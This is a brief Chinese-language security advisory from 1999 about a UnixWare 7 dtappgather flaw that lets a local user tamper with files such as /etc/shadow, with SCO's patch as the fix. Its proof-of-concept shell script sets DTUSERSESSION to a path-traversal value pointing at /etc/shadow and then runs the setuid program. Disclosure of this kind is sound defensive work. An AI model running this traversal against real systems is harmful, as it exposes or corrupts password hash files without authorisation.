UNIXWARE7的dtappgather漏洞发布时间:1999-11-19 更新时间:1999-11-19 严重程度:中 威胁程度:读取受限文件 错误类型:环境错误 利用方式:服务器模式 受影响系统 SCO详细描述 unixware7的dtappgater是作为超级用户权利来运行的,但不正确的$DTUSERSESSION 检查使其不确定是否此文件可读写或属于谁能运行。 测试代码 #!/bin/sh # # UnixWare 7's dtappgather # Discovered by: K2 (ktwo@ktwo.ca) # # UnixWare 7's dtappgather runs with superuser # privileges, but improperly check $DTUSERSESSION # to ensure that the file is readable/writeable or # owned by the user running it. export DTUSERSESSION=../../../../etc/shadow cd /usr/dt/bin ./dtappgather ls -la /etc/shadow 解决方案 到SCO公司下载补丁 相关信息 |
